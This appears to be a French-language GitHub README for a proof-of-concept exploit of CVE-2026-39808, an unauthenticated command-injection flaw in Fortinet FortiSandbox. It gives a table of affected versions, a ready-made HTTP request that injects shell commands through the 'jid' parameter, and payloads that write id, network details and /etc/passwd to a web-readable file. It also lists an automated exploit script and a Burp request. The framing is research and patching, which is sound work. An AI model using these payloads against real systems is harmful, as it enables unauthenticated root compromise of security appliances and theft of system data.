
CVE-2026-39808
Ce dépôt contient une preuve de concept (PoC) propre et bien documentée pour CVE-2026-39808 — une vulnérabilité critique d'injection de commandes non authentifiée dans Fortinet FortiSandbox qui permet l'évasion de la sandbox et l'exécution de code à distance en tant que root (uid=0).
jid
Exploitation réussie affichant uid=0 gid=0 groups=0
| Plage de versions | Statut |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnérable |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnérable |
| 4.4.9+ / 5.0.6+ | Corrigé |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Ouvrir dans le navigateur :
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Exploit Python automatiséburp-request.txt → Requête Burp Suite prête à l'emploipayloads.md → Collection de payloads utilesscreenshots/ → Images de l'exploitation étape par étapeREADME.md → Ce fichierMettez à jour FortiSandbox immédiatement vers l'une des versions suivantes :
Fortinet a publié des correctifs officiels pour cette vulnérabilité.
Conçu à des fins de recherche et d'apprentissage
⭐ Mettez une étoile à ce dépôt s'il vous a aidé !